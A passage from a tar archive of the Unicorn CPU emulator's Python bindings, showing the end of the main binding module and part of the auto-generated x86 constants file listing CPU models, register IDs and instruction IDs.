ctypes.string_at(self.context, self.size) def __del__(self) -> None: # We need this property since we shouldn't free it if the object is constructed from pickled bytes. if self._to_free: uclib.uc_context_free(self._context) UC_MMIO_READ_TYPE = Callable[[Uc, int, int, Any], int] UC_MMIO_WRITE_TYPE = Callable[[Uc, int, int, int, Any], None] __all__ = ['Uc', 'UcContext', 'ucsubclass', 'UcError', 'uc_version', 'version_bind', 'uc_arch_supported', 'debug'] �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/python/unicorn/x86_const.py��������������������������������������������������0000664�0000000�0000000�00000116051�14675241067�0022210�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT [x86_const.py] # X86 CPU UC_CPU_X86_QEMU64 = 0 UC_CPU_X86_PHENOM = 1 UC_CPU_X86_CORE2DUO = 2 UC_CPU_X86_KVM64 = 3 UC_CPU_X86_QEMU32 = 4 UC_CPU_X86_KVM32 = 5 UC_CPU_X86_COREDUO = 6 UC_CPU_X86_486 = 7 UC_CPU_X86_PENTIUM = 8 UC_CPU_X86_PENTIUM2 = 9 UC_CPU_X86_PENTIUM3 = 10 UC_CPU_X86_ATHLON = 11 UC_CPU_X86_N270 = 12 UC_CPU_X86_CONROE = 13 UC_CPU_X86_PENRYN = 14 UC_CPU_X86_NEHALEM = 15 UC_CPU_X86_WESTMERE = 16 UC_CPU_X86_SANDYBRIDGE = 17 UC_CPU_X86_IVYBRIDGE = 18 UC_CPU_X86_HASWELL = 19 UC_CPU_X86_BROADWELL = 20 UC_CPU_X86_SKYLAKE_CLIENT = 21 UC_CPU_X86_SKYLAKE_SERVER = 22 UC_CPU_X86_CASCADELAKE_SERVER = 23 UC_CPU_X86_COOPERLAKE = 24 UC_CPU_X86_ICELAKE_CLIENT = 25 UC_CPU_X86_ICELAKE_SERVER = 26 UC_CPU_X86_DENVERTON = 27 UC_CPU_X86_SNOWRIDGE = 28 UC_CPU_X86_KNIGHTSMILL = 29 UC_CPU_X86_OPTERON_G1 = 30 UC_CPU_X86_OPTERON_G2 = 31 UC_CPU_X86_OPTERON_G3 = 32 UC_CPU_X86_OPTERON_G4 = 33 UC_CPU_X86_OPTERON_G5 = 34 UC_CPU_X86_EPYC = 35 UC_CPU_X86_DHYANA = 36 UC_CPU_X86_EPYC_ROME = 37 UC_CPU_X86_ENDING = 38 # X86 registers UC_X86_REG_INVALID = 0 UC_X86_REG_AH = 1 UC_X86_REG_AL = 2 UC_X86_REG_AX = 3 UC_X86_REG_BH = 4 UC_X86_REG_BL = 5 UC_X86_REG_BP = 6 UC_X86_REG_BPL = 7 UC_X86_REG_BX = 8 UC_X86_REG_CH = 9 UC_X86_REG_CL = 10 UC_X86_REG_CS = 11 UC_X86_REG_CX = 12 UC_X86_REG_DH = 13 UC_X86_REG_DI = 14 UC_X86_REG_DIL = 15 UC_X86_REG_DL = 16 UC_X86_REG_DS = 17 UC_X86_REG_DX = 18 UC_X86_REG_EAX = 19 UC_X86_REG_EBP = 20 UC_X86_REG_EBX = 21 UC_X86_REG_ECX = 22 UC_X86_REG_EDI = 23 UC_X86_REG_EDX = 24 UC_X86_REG_EFLAGS = 25 UC_X86_REG_EIP = 26 UC_X86_REG_ES = 28 UC_X86_REG_ESI = 29 UC_X86_REG_ESP = 30 UC_X86_REG_FPSW = 31 UC_X86_REG_FS = 32 UC_X86_REG_GS = 33 UC_X86_REG_IP = 34 UC_X86_REG_RAX = 35 UC_X86_REG_RBP = 36 UC_X86_REG_RBX = 37 UC_X86_REG_RCX = 38 UC_X86_REG_RDI = 39 UC_X86_REG_RDX = 40 UC_X86_REG_RIP = 41 UC_X86_REG_RSI = 43 UC_X86_REG_RSP = 44 UC_X86_REG_SI = 45 UC_X86_REG_SIL = 46 UC_X86_REG_SP = 47 UC_X86_REG_SPL = 48 UC_X86_REG_SS = 49 UC_X86_REG_CR0 = 50 UC_X86_REG_CR1 = 51 UC_X86_REG_CR2 = 52 UC_X86_REG_CR3 = 53 UC_X86_REG_CR4 = 54 UC_X86_REG_CR8 = 58 UC_X86_REG_DR0 = 66 UC_X86_REG_DR1 = 67 UC_X86_REG_DR2 = 68 UC_X86_REG_DR3 = 69 UC_X86_REG_DR4 = 70 UC_X86_REG_DR5 = 71 UC_X86_REG_DR6 = 72 UC_X86_REG_DR7 = 73 UC_X86_REG_FP0 = 82 UC_X86_REG_FP1 = 83 UC_X86_REG_FP2 = 84 UC_X86_REG_FP3 = 85 UC_X86_REG_FP4 = 86 UC_X86_REG_FP5 = 87 UC_X86_REG_FP6 = 88 UC_X86_REG_FP7 = 89 UC_X86_REG_K0 = 90 UC_X86_REG_K1 = 91 UC_X86_REG_K2 = 92 UC_X86_REG_K3 = 93 UC_X86_REG_K4 = 94 UC_X86_REG_K5 = 95 UC_X86_REG_K6 = 96 UC_X86_REG_K7 = 97 UC_X86_REG_MM0 = 98 UC_X86_REG_MM1 = 99 UC_X86_REG_MM2 = 100 UC_X86_REG_MM3 = 101 UC_X86_REG_MM4 = 102 UC_X86_REG_MM5 = 103 UC_X86_REG_MM6 = 104 UC_X86_REG_MM7 = 105 UC_X86_REG_R8 = 106 UC_X86_REG_R9 = 107 UC_X86_REG_R10 = 108 UC_X86_REG_R11 = 109 UC_X86_REG_R12 = 110 UC_X86_REG_R13 = 111 UC_X86_REG_R14 = 112 UC_X86_REG_R15 = 113 UC_X86_REG_ST0 = 114 UC_X86_REG_ST1 = 115 UC_X86_REG_ST2 = 116 UC_X86_REG_ST3 = 117 UC_X86_REG_ST4 = 118 UC_X86_REG_ST5 = 119 UC_X86_REG_ST6 = 120 UC_X86_REG_ST7 = 121 UC_X86_REG_XMM0 = 122 UC_X86_REG_XMM1 = 123 UC_X86_REG_XMM2 = 124 UC_X86_REG_XMM3 = 125 UC_X86_REG_XMM4 = 126 UC_X86_REG_XMM5 = 127 UC_X86_REG_XMM6 = 128 UC_X86_REG_XMM7 = 129 UC_X86_REG_XMM8 = 130 UC_X86_REG_XMM9 = 131 UC_X86_REG_XMM10 = 132 UC_X86_REG_XMM11 = 133 UC_X86_REG_XMM12 = 134 UC_X86_REG_XMM13 = 135 UC_X86_REG_XMM14 = 136 UC_X86_REG_XMM15 = 137 UC_X86_REG_XMM16 = 138 UC_X86_REG_XMM17 = 139 UC_X86_REG_XMM18 = 140 UC_X86_REG_XMM19 = 141 UC_X86_REG_XMM20 = 142 UC_X86_REG_XMM21 = 143 UC_X86_REG_XMM22 = 144 UC_X86_REG_XMM23 = 145 UC_X86_REG_XMM24 = 146 UC_X86_REG_XMM25 = 147 UC_X86_REG_XMM26 = 148 UC_X86_REG_XMM27 = 149 UC_X86_REG_XMM28 = 150 UC_X86_REG_XMM29 = 151 UC_X86_REG_XMM30 = 152 UC_X86_REG_XMM31 = 153 UC_X86_REG_YMM0 = 154 UC_X86_REG_YMM1 = 155 UC_X86_REG_YMM2 = 156 UC_X86_REG_YMM3 = 157 UC_X86_REG_YMM4 = 158 UC_X86_REG_YMM5 = 159 UC_X86_REG_YMM6 = 160 UC_X86_REG_YMM7 = 161 UC_X86_REG_YMM8 = 162 UC_X86_REG_YMM9 = 163 UC_X86_REG_YMM10 = 164 UC_X86_REG_YMM11 = 165 UC_X86_REG_YMM12 = 166 UC_X86_REG_YMM13 = 167 UC_X86_REG_YMM14 = 168 UC_X86_REG_YMM15 = 169 UC_X86_REG_YMM16 = 170 UC_X86_REG_YMM17 = 171 UC_X86_REG_YMM18 = 172 UC_X86_REG_YMM19 = 173 UC_X86_REG_YMM20 = 174 UC_X86_REG_YMM21 = 175 UC_X86_REG_YMM22 = 176 UC_X86_REG_YMM23 = 177 UC_X86_REG_YMM24 = 178 UC_X86_REG_YMM25 = 179 UC_X86_REG_YMM26 = 180 UC_X86_REG_YMM27 = 181 UC_X86_REG_YMM28 = 182 UC_X86_REG_YMM29 = 183 UC_X86_REG_YMM30 = 184 UC_X86_REG_YMM31 = 185 UC_X86_REG_ZMM0 = 186 UC_X86_REG_ZMM1 = 187 UC_X86_REG_ZMM2 = 188 UC_X86_REG_ZMM3 = 189 UC_X86_REG_ZMM4 = 190 UC_X86_REG_ZMM5 = 191 UC_X86_REG_ZMM6 = 192 UC_X86_REG_ZMM7 = 193 UC_X86_REG_ZMM8 = 194 UC_X86_REG_ZMM9 = 195 UC_X86_REG_ZMM10 = 196 UC_X86_REG_ZMM11 = 197 UC_X86_REG_ZMM12 = 198 UC_X86_REG_ZMM13 = 199 UC_X86_REG_ZMM14 = 200 UC_X86_REG_ZMM15 = 201 UC_X86_REG_ZMM16 = 202 UC_X86_REG_ZMM17 = 203 UC_X86_REG_ZMM18 = 204 UC_X86_REG_ZMM19 = 205 UC_X86_REG_ZMM20 = 206 UC_X86_REG_ZMM21 = 207 UC_X86_REG_ZMM22 = 208 UC_X86_REG_ZMM23 = 209 UC_X86_REG_ZMM24 = 210 UC_X86_REG_ZMM25 = 211 UC_X86_REG_ZMM26 = 212 UC_X86_REG_ZMM27 = 213 UC_X86_REG_ZMM28 = 214 UC_X86_REG_ZMM29 = 215 UC_X86_REG_ZMM30 = 216 UC_X86_REG_ZMM31 = 217 UC_X86_REG_R8B = 218 UC_X86_REG_R9B = 219 UC_X86_REG_R10B = 220 UC_X86_REG_R11B = 221 UC_X86_REG_R12B = 222 UC_X86_REG_R13B = 223 UC_X86_REG_R14B = 224 UC_X86_REG_R15B = 225 UC_X86_REG_R8D = 226 UC_X86_REG_R9D = 227 UC_X86_REG_R10D = 228 UC_X86_REG_R11D = 229 UC_X86_REG_R12D = 230 UC_X86_REG_R13D = 231 UC_X86_REG_R14D = 232 UC_X86_REG_R15D = 233 UC_X86_REG_R8W = 234 UC_X86_REG_R9W = 235 UC_X86_REG_R10W = 236 UC_X86_REG_R11W = 237 UC_X86_REG_R12W = 238 UC_X86_REG_R13W = 239 UC_X86_REG_R14W = 240 UC_X86_REG_R15W = 241 UC_X86_REG_IDTR = 242 UC_X86_REG_GDTR = 243 UC_X86_REG_LDTR = 244 UC_X86_REG_TR = 245 UC_X86_REG_FPCW = 246 UC_X86_REG_FPTAG = 247 UC_X86_REG_MSR = 248 UC_X86_REG_MXCSR = 249 UC_X86_REG_FS_BASE = 250 UC_X86_REG_GS_BASE = 251 UC_X86_REG_FLAGS = 252 UC_X86_REG_RFLAGS = 253 UC_X86_REG_FIP = 254 UC_X86_REG_FCS = 255 UC_X86_REG_FDP = 256 UC_X86_REG_FDS = 257 UC_X86_REG_FOP = 258 UC_X86_REG_ENDING = 259 # X86 instructions UC_X86_INS_INVALID = 0 UC_X86_INS_AAA = 1 UC_X86_INS_AAD = 2 UC_X86_INS_AAM = 3 UC_X86_INS_AAS = 4 UC_X86_INS_FABS = 5 UC_X86_INS_ADC = 6 UC_X86_INS_ADCX = 7 UC_X86_INS_ADD = 8 UC_X86_INS_ADDPD = 9 UC_X86_INS_ADDPS = 10 UC_X86_INS_ADDSD = 11 UC_X86_INS_ADDSS = 12 UC_X86_INS_ADDSUBPD = 13 UC_X86_INS_ADDSUBPS = 14 UC_X86_INS_FADD = 15 UC_X86_INS_FIADD = 16 UC_X86_INS_FADDP = 17 UC_X86_INS_ADOX = 18 UC_X86_INS_AESDECLAST = 19 UC_X86_INS_AESDEC = 20 UC_X86_INS_AESENCLAST = 21 UC_X86_INS_AESENC = 22 UC_X86_INS_AESIMC = 23 UC_X86_INS_AESKEYGENASSIST = 24 UC_X86_INS_AND = 25 UC_X86_INS_ANDN = 26 UC_X86_INS_ANDNPD = 27 UC_X86_INS_ANDNPS = 28 UC_X86_INS_ANDPD = 29 UC_X86_INS_ANDPS = 30 UC_X86_INS_ARPL = 31 UC_X86_INS_BEXTR = 32 UC_X86_INS_BLCFILL = 33 UC_X86_INS_BLCI = 34 UC_X86_INS_BLCIC = 35 UC_X86_INS_BLCMSK = 36 UC_X86_INS_BLCS = 37 UC_X86_INS_BLENDPD = 38 UC_X86_INS_BLENDPS = 39 UC_X86_INS_BLENDVPD = 40 UC_X86_INS_BLENDVPS = 41 UC_X86_INS_BLSFILL = 42 UC_X86_INS_BLSI = 43 UC_X86_INS_BLSIC = 44 UC_X86_INS_BLSMSK = 45 UC_X86_INS_BLSR = 46 UC_X86_INS_BOUND = 47 UC_X86_INS_BSF = 48 UC_X86_INS_BSR = 49 UC_X86_INS_BSWAP = 50 UC_X86_INS_BT = 51 UC_X86_INS_BTC = 52 UC_X86_INS_BTR = 53 UC_X86_INS_BTS = 54 UC_X86_INS_BZHI = 55 UC_X86_INS_CALL = 56 UC_X86_INS_CBW = 57 UC_X86_INS_CDQ = 58 UC_X86_INS_CDQE = 59 UC_X86_INS_FCHS = 60 UC_X86_INS_CLAC = 61 UC_X86_INS_CLC = 62 UC_X86_INS_CLD = 63 UC_X86_INS_CLFLUSH = 64 UC_X86_INS_CLFLUSHOPT = 65 UC_X86_INS_CLGI = 66 UC_X86_INS_CLI = 67 UC_X86_INS_CLTS = 68 UC_X86_INS_CLWB = 69 UC_X86_INS_CMC = 70 UC_X86_INS_CMOVA = 71 UC_X86_INS_CMOVAE = 72 UC_X86_INS_CMOVB = 73 UC_X86_INS_CMOVBE = 74 UC_X86_INS_FCMOVBE = 75 UC_X86_INS_FCMOVB = 76 UC_X86_INS_CMOVE = 77 UC_X86_INS_FCMOVE = 78 UC_X86_INS_CMOVG = 79 UC_X86_INS_CMOVGE = 80 UC_X86_INS_CMOVL = 81 UC_X86_INS_CMOVLE = 82 UC_X86_INS_FCMOVNBE = 83 UC_X86_INS_FCMOVNB = 84 UC_X86_INS_CMOVNE = 85 UC_X86_INS_FCMOVNE = 86 UC_X86_INS_CMOVNO = 87 UC_X86_INS_CMOVNP = 88 UC_X86_INS_FCMOVNU = 89 UC_X86_INS_CMOVNS = 90 UC_X86_INS_CMOVO = 91 UC_X86_INS_CMOVP = 92 UC_X86_INS_FCMOVU = 93 UC_X86_INS_CMOVS = 94 UC_X86_INS_CMP = 95 UC_X86_INS_CMPPD = 96 UC_X86_INS_CMPPS = 97 UC_X86_INS_CMPSB = 98 UC_X86_INS_CMPSD = 99 UC_X86_INS_CMPSQ = 100 UC_X86_INS_CMPSS = 101 UC_X86_INS_CMPSW = 102 UC_X86_INS_CMPXCHG16B = 103 UC_X86_INS_CMPXCHG = 104 UC_X86_INS_CMPXCHG8B = 105 UC_X86_INS_COMISD = 106 UC_X86_INS_COMISS = 107 UC_X86_INS_FCOMP = 108 UC_X86_INS_FCOMPI = 109 UC_X86_INS_FCOMI = 110 UC_X86_INS_FCOM = 111 UC_X86_INS_FCOS = 112 UC_X86_INS_CPUID = 113 UC_X86_INS_CQO = 114 UC_X86_INS_CRC32 = 115 UC_X86_INS_CVTDQ2PD = 116 UC_X86_INS_CVTDQ2PS = 117 UC_X86_INS_CVTPD2DQ = 118 UC_X86_INS_CVTPD2PS = 119 UC_X86_INS_CVTPS2DQ = 120 UC_X86_INS_CVTPS2PD = 121 UC_X86_INS_CVTSD2SI = 122 UC_X86_INS_CVTSD2SS = 123 UC_X86_INS_CVTSI2SD = 124 UC_X86_INS_CVTSI2SS = 125 UC_X86_INS_CVTSS2SD = 126 UC_X86_INS_CVTSS2SI = 127 UC_X86_INS_CVTTPD2DQ = 128 UC_X86_INS_CVTTPS2DQ = 129 UC_X86_INS_CVTTSD2SI = 130 UC_X86_INS_CVTTSS2SI = 131 UC_X86_INS_CWD = 132 UC_X86_INS_CWDE = 133 UC_X86_INS_DAA = 134 UC_X86_INS_DAS = 135 UC_X86_INS_DATA16 = 136 UC_X86_INS_DEC = 137 UC_X86_INS_DIV = 138 UC_X86_INS_DIVPD = 139 UC_X86_INS_DIVPS = 140 UC_X86_INS_FDIVR = 141 UC_X86_INS_FIDIVR = 142 UC_X86_INS_FDIVRP = 143 UC_X86_INS_DIVSD = 144 UC_X86_INS_DIVSS = 145 UC_X86_INS_FDIV = 146 UC_X86_INS_FIDIV = 147 UC_X86_INS_FDIVP = 148 UC_X86_INS_DPPD = 149 UC_X86_INS_DPPS = 150 UC_X86_INS_RET = 151 UC_X86_INS_ENCLS = 152 UC_X86_INS_ENCLU = 153 UC_X86_INS_ENTER = 154 UC_X86_INS_EXTRACTPS = 155 UC_X86_INS_EXTRQ = 156 UC_X86_INS_F2XM1 = 157 UC_X86_INS_LCALL = 158 UC_X86_INS_LJMP = 159 UC_X86_INS_FBLD = 160 UC_X86_INS_FBSTP = 161 UC_X86_INS_FCOMPP = 162 UC_X86_INS_FDECSTP = 163 UC_X86_INS_FEMMS = 164 UC_X86_INS_FFREE = 165 UC_X86_INS_FICOM = 166 UC_X86_INS_FICOMP = 167 UC_X86_INS_FINCSTP = 168 UC_X86_INS_FLDCW = 169 UC_X86_INS_FLDENV = 170 UC_X86_INS_FLDL2E = 171 UC_X86_INS_FLDL2T = 172 UC_X86_INS_FLDLG2 = 173 UC_X86_INS_FLDLN2 = 174 UC_X86_INS_FLDPI = 175 UC_X86_INS_FNCLEX = 176 UC_X86_INS_FNINIT = 177 UC_X86_INS_FNOP = 178 UC_X86_INS_FNSTCW = 179 UC_X86_INS_FNSTSW = 180 UC_X86_INS_FPATAN = 181 UC_X86_INS_FPREM = 182 UC_X86_INS_FPREM1 = 183 UC_X86_INS_FPTAN = 184 UC_X86_INS_FFREEP = 185 UC_X86_INS_FRNDINT = 186 UC_X86_INS_FRSTOR = 187 UC_X86_INS_FNSAVE = 188 UC_X86_INS_FSCALE = 189 UC_X86_INS_FSETPM = 190 UC_X86_INS_FSINCOS = 191 UC_X86_INS_FNSTENV = 192 UC_X86_INS_FXAM = 193 UC_X86_INS_FXRSTOR = 194 UC_X86_INS_FXRSTOR64 = 195 UC_X86_INS_FXSAVE = 196 UC_X86_INS_FXSAVE64 = 197 UC_X86_INS_FXTRACT = 198 UC_X86_INS_FYL2X = 199 UC_X86_INS_FYL2XP1 = 200 UC_X86_INS_MOVAPD = 201 UC_X86_INS_MOVAPS = 202 UC_X86_INS_ORPD = 203 UC_X86_INS_ORPS = 204 UC_X86_INS_VMOVAPD = 205 UC_X86_INS_VMOVAPS = 206 UC_X86_INS_XORPD = 207 UC_X86_INS_XORPS = 208 UC_X86_INS_GETSEC = 209 UC_X86_INS_HADDPD = 210 UC_X86_INS_HADDPS = 211 UC_X86_INS_HLT = 212 UC_X86_INS_HSUBPD = 213 UC_X86_INS_HSUBPS = 214 UC_X86_INS_IDIV = 215 UC_X86_INS_FILD = 216 UC_X86_INS_IMUL = 217 UC_X86_INS_IN = 218 UC_X86_INS_INC = 219 UC_X86_INS_INSB = 220 UC_X86_INS_INSERTPS = 221 UC_X86_INS_INSERTQ = 222 UC_X86_INS_INSD = 223 UC_X86_INS_INSW = 224 UC_X86_INS_INT = 225 UC_X86_INS_INT1 = 226 UC_X86_INS_INT3 = 227 UC_X86_INS_INTO = 228 UC_X86_INS_INVD = 229 UC_X86_INS_INVEPT = 230 UC_X86_INS_INVLPG = 231 UC_X86_INS_INVLPGA = 232 UC_X86_INS_INVPCID = 233 UC_X86_INS_INVVPID = 234 UC_X86_INS_IRET = 235 UC_X86_INS_IRETD = 236 UC_X86_INS_IRETQ = 237 UC_X86_INS_FISTTP = 238 UC_X86_INS_FIST = 239 UC_X86_INS_FISTP = 240 UC_X86_INS_UCOMISD = 241 UC_X86_INS_UCOMISS = 242 UC_X86_INS_VCOMISD = 243 UC_X86_INS_VCOMISS = 244 UC_X86_INS_VCVTSD2SS = 245 UC_X86_INS_VCVTSI2SD = 246 UC_X86_INS_VCVTSI2SS = 247 UC_X86_INS_VCVTSS2SD = 248 UC_X86_INS_VCVTTSD2SI = 249 UC_X86_INS_VCVTTSD2USI = 250 UC_X86_INS_VCVTTSS2SI = 251 UC_X86_INS_VCVTTSS2USI = 252 UC_X86_INS_VCVTUSI2SD = 253 UC_X86_INS_VCVTUSI2SS = 254 UC_X86_INS_VUCOMISD = 255 UC_X86_INS_VUCOMISS = 256 UC_X86_INS_JAE = 257 UC_X86_INS_JA = 258 UC_X86_INS_JBE = 259 UC_X86_INS_JB = 260 UC_X86_INS_JCXZ = 261 UC_X86_INS_JECXZ = 262 UC_X86_INS_JE = 263 UC_X86_INS_JGE = 264 UC_X86_INS_JG = 265 UC_X86_INS_JLE = 266 UC_X86_INS_JL = 267 UC_X86_INS_JMP = 268 UC_X86_INS_JNE = 269 UC_X86_INS_JNO = 270 UC_X86_INS_JNP = 271 UC_X86_INS_JNS = 272 UC_X86_INS_JO = 273 UC_X86_INS_JP = 274 UC_X86_INS_JRCXZ = 275 UC_X86_INS_JS = 276 UC_X86_INS_KANDB = 277 UC_X86_INS_KANDD = 278 UC_X86_INS_KANDNB = 279 UC_X86_INS_KANDND = 280 UC_X86_INS_KANDNQ = 281 UC_X86_INS_KANDNW = 282 UC_X86_INS_KANDQ = 283 UC_X86_INS_KANDW = 284 UC_X86_INS_KMOVB = 285 UC_X86_INS_KMOVD = 286 UC_X86_INS_KMOVQ = 287 UC_X86_INS_KMOVW = 288 UC_X86_INS_KNOTB = 289 UC_X86_INS_KNOTD = 290 UC_X86_INS_KNOTQ = 291 UC_X86_INS_KNOTW = 292 UC_X86_INS_KORB = 293 UC_X86_INS_KORD = 294 UC_X86_INS_KORQ = 295 UC_X86_INS_KORTESTB = 296 UC_X86_INS_KORTESTD = 297 UC_X86_INS_KORTESTQ = 298 UC_X86_INS_KORTESTW = 299 UC_X86_INS_KORW = 300 UC_X86_INS_KSHIFTLB = 301 UC_X86_INS_KSHIFTLD = 302 UC_X86_INS_KSHIFTLQ = 303 UC_X86_INS_KSHIFTLW = 304 UC_X86_INS_KSHIFTRB = 305 UC_X86_INS_KSHIFTRD = 306 UC_X86_INS_KSHIFTRQ = 307 UC_X86_INS_KSHIFTRW = 308 UC_X86_INS_KUNPCKBW = 309 UC_X86_INS_KXNORB = 310 UC_X86_INS_KXNORD = 311 UC_X86_INS_KXNORQ = 312 UC_X86_INS_KXNORW = 313 UC_X86_INS_KXORB = 314 UC_X86_INS_KXORD = 315 UC_X86_INS_KXORQ = 316 UC_X86_INS_KXORW = 317 UC_X86_INS_LAHF = 318 UC_X86_INS_LAR = 319 UC_X86_INS_LDDQU = 320 UC_X86_INS_LDMXCSR = 321 UC_X86_INS_LDS = 322 UC_X86_INS_FLDZ = 323 UC_X86_INS_FLD1 = 324 UC_X86_INS_FLD = 325 UC_X86_INS_LEA = 326 UC_X86_INS_LEAVE = 327 UC_X86_INS_LES = 328 UC_X86_INS_LFENCE = 329 UC_X86_INS_LFS = 330 UC_X86_INS_LGDT = 331 UC_X86_INS_LGS = 332 UC_X86_INS_LIDT = 333 UC_X86_INS_LLDT = 334 UC_X86_INS_LMSW = 335 UC_X86_INS_OR = 336 UC_X86_INS_SUB = 337 UC_X86_INS_XOR = 338 UC_X86_INS_LODSB = 339 UC_X86_INS_LODSD = 340 UC_X86_INS_LODSQ = 341 UC_X86_INS_LODSW = 342 UC_X86_INS_LOOP = 343 UC_X86_INS_LOOPE = 344 UC_X86_INS_LOOPNE = 345 UC_X86_INS_RETF = 346 UC_X86_INS_RETFQ = 347 UC_X86_INS_LSL = 348 UC_X86_INS_LSS = 349 UC_X86_INS_LTR = 350 UC_X86_INS_XADD = 351 UC_X86_INS_LZCNT = 352 UC_X86_INS_MASKMOVDQU = 353 UC_X86_INS_MAXPD = 354 UC_X86_INS_MAXPS = 355 UC_X86_INS_MAXSD = 356 UC_X86_INS_MAXSS = 357 UC_X86_INS_MFENCE = 358 UC_X86_INS_MINPD = 359 UC_X86_INS_MINPS = 360 UC_X86_INS_MINSD = 361 UC_X86_INS_MINSS = 362 UC_X86_INS_CVTPD2PI = 363 UC_X86_INS_CVTPI2PD = 364 UC_X86_INS_CVTPI2PS = 365 UC_X86_INS_CVTPS2PI = 366 UC_X86_INS_CVTTPD2PI = 367 UC_X86_INS_CVTTPS2PI = 368 UC_X86_INS_EMMS = 369 UC_X86_INS_MASKMOVQ = 370 UC_X86_INS_MOVD = 371 UC_X86_INS_MOVDQ2Q = 372 UC_X86_INS_MOVNTQ = 373 UC_X86_INS_MOVQ2DQ = 374 UC_X86_INS_MOVQ = 375 UC_X86_INS_PABSB = 376 UC_X86_INS_PABSD = 377 UC_X86_INS_PABSW = 378 UC_X86_INS_PACKSSDW = 379 UC_X86_INS_PACKSSWB = 380 UC_X86_INS_PACKUSWB = 381 UC_X86_INS_PADDB = 382 UC_X86_INS_PADDD = 383 UC_X86_INS_PADDQ = 384 UC_X86_INS_PADDSB = 385 UC_X86_INS_PADDSW = 386 UC_X86_INS_PADDUSB = 387 UC_X86_INS_PADDUSW = 388 UC_X86_INS_PADDW = 389 UC_X86_INS_PALIGNR = 390 UC_X86_INS_PANDN = 391 UC_X86_INS_PAND = 392 UC_X86_INS_PAVGB = 393 UC_X86_INS_PAVGW = 394 UC_X86_INS_PCMPEQB = 395 UC_X86_INS_PCMPEQD = 396 UC_X86_INS_PCMPEQW = 397 UC_X86_INS_PCMPGTB = 398 UC_X86_INS_PCMPGTD = 399 UC_X86_INS_PCMPGTW = 400 UC_X86_INS_PEXTRW = 401 UC_X86_INS_PHADDSW = 402 UC_X86_INS_PHADDW = 403 UC_X86_INS_PHADDD = 404 UC_X86_INS_PHSUBD = 405 UC_X86_INS_PHSUBSW = 406 UC_X86_INS_PHSUBW = 407 UC_X86_INS_PINSRW = 408 UC_X86_INS_PMADDUBSW = 409 UC_X86_INS_PMADDWD = 410 UC_X86_INS_PMAXSW = 411 UC_X86_INS_PMAXUB = 412 UC_X86_INS_PMINSW = 413 UC_X86_INS_PMINUB = 414 UC_X86_INS_PMOVMSKB = 415 UC_X86_INS_PMULHRSW = 416 UC_X86_INS_PMULHUW = 417 UC_X86_INS_PMULHW = 418 UC_X86_INS_PMULLW = 419 UC_X86_INS_PMULUDQ = 420 UC_X86_INS_POR = 421 UC_X86_INS_PSADBW = 422 UC_X86_INS_PSHUFB = 423 UC_X86_INS_PSHUFW = 424 UC_X86_INS_PSIGNB = 425 UC_X86_INS_PSIGND = 426 UC_X86_INS_PSIGNW = 427 UC_X86_INS_PSLLD = 428 UC_X86_INS_PSLLQ = 429 UC_X86_INS_PSLLW = 430 UC_X86_INS_PSRAD = 431 UC_X86_INS_PSRAW = 432 UC_X86_INS_PSRLD = 433 UC_X86_INS_PSRLQ = 434 UC_X86_INS_PSRLW = 435 UC_X86_INS_PSUBB = 436 UC_X86_INS_PSUBD = 437 UC_X86_INS_PSUBQ = 438 UC_X86_INS_PSUBSB = 439 UC_X86_INS_PSUBSW = 440 UC_X86_INS_PSUBUSB = 441 UC_X86_INS_PSUBUSW = 442 UC_X86_INS_PSUBW = 443 UC_X86_INS_PUNPCKHBW = 444 UC_X86_INS_PUNPCKHDQ = 445 UC_X86_INS_PUNPCKHWD = 446 UC_X86_INS_PUNPCKLBW = 447 UC_X86_INS_PUNPCKLDQ = 448 UC_X86_INS_PUNPCKLWD = 449 UC_X86_INS_PXOR = 450 UC_X86_INS_MONITOR = 451 UC_X86_INS_MONTMUL = 452 UC_X86_INS_MOV = 453 UC_X86_INS_MOVABS = 454 UC_X86_INS_MOVBE = 455 UC_X86_INS_MOVDDUP = 456 UC_X86_INS_MOVDQA = 457 UC_X86_INS_MOVDQU = 458 UC_X86_INS_MOVHLPS = 459 UC_X86_INS_MOVHPD = 460 UC_X86_INS_MOVHPS = 461 UC_X86_INS_MOVLHPS = 462 UC_X86_INS_MOVLPD = 463 UC_X86_INS_MOVLPS = 464 UC_X86_INS_MOVMSKPD = 465 UC_X86_INS_MOVMSKPS = 466 UC_X86_INS_MOVNTDQA = 467 UC_X86_INS_MOVNTDQ = 468 UC_X86_INS_MOVNTI = 469 UC_X86_INS_MOVNTPD = 470 UC_X86_INS_MOVNTPS = 471 UC_X86_INS_MOVNTSD = 472 UC_X86_INS_MOVNTSS = 473 UC_X86_INS_MOVSB = 474 UC_X86_INS_MOVSD = 475 UC_X86_INS_MOVSHDUP = 476 UC_X86_INS_MOVSLDUP = 477 UC_X86_INS_MOVSQ = 478 UC_X86_INS_MOVSS = 479 UC_X86_INS_MOVSW = 480 UC_X86_INS_MOVSX = 481 UC_X86_INS_MOVSXD = 482 UC_X86_INS_MOVUPD = 483 UC_X86_INS_MOVUPS = 484 UC_X86_INS_MOVZX = 485 UC_X86_INS_MPSADBW = 486 UC_X86_INS_MUL = 487 UC_X86_INS_MULPD = 488 UC_X86_INS_MULPS = 489 UC_X86_INS_MULSD = 490 UC_X86_INS_MULSS = 491 UC_X86_INS_MULX = 492 UC_X86_INS_FMUL = 493 UC_X86_INS_FIMUL = 494 UC_X86_INS_FMULP = 495 UC_X86_INS_MWAIT = 496 UC_X86_INS_NEG = 497 UC_X86_INS_NOP = 498 UC_X86_INS_NOT = 499 UC_X86_INS_OUT = 500 UC_X86_INS_OUTSB = 501 UC_X86_INS_OUTSD = 502 UC_X86_INS_OUTSW = 503 UC_X86_INS_PACKUSDW = 504 UC_X86_INS_PAUSE = 505 UC_X86_INS_PAVGUSB = 506 UC_X86_INS_PBLENDVB = 507 UC_X86_INS_PBLENDW = 508 UC_X86_INS_PCLMULQDQ = 509 UC_X86_INS_PCMPEQQ = 510 UC_X86_INS_PCMPESTRI = 511 UC_X86_INS_PCMPESTRM = 512 UC_X86_INS_PCMPGTQ = 513 UC_X86_INS_PCMPISTRI = 514 UC_X86_INS_PCMPISTRM = 515 UC_X86_INS_PCOMMIT = 516 UC_X86_INS_PDEP = 517 UC_X86_INS_PEXT = 518 UC_X86_INS_PEXTRB = 519 UC_X86_INS_PEXTRD = 520 UC_X86_INS_PEXTRQ = 521 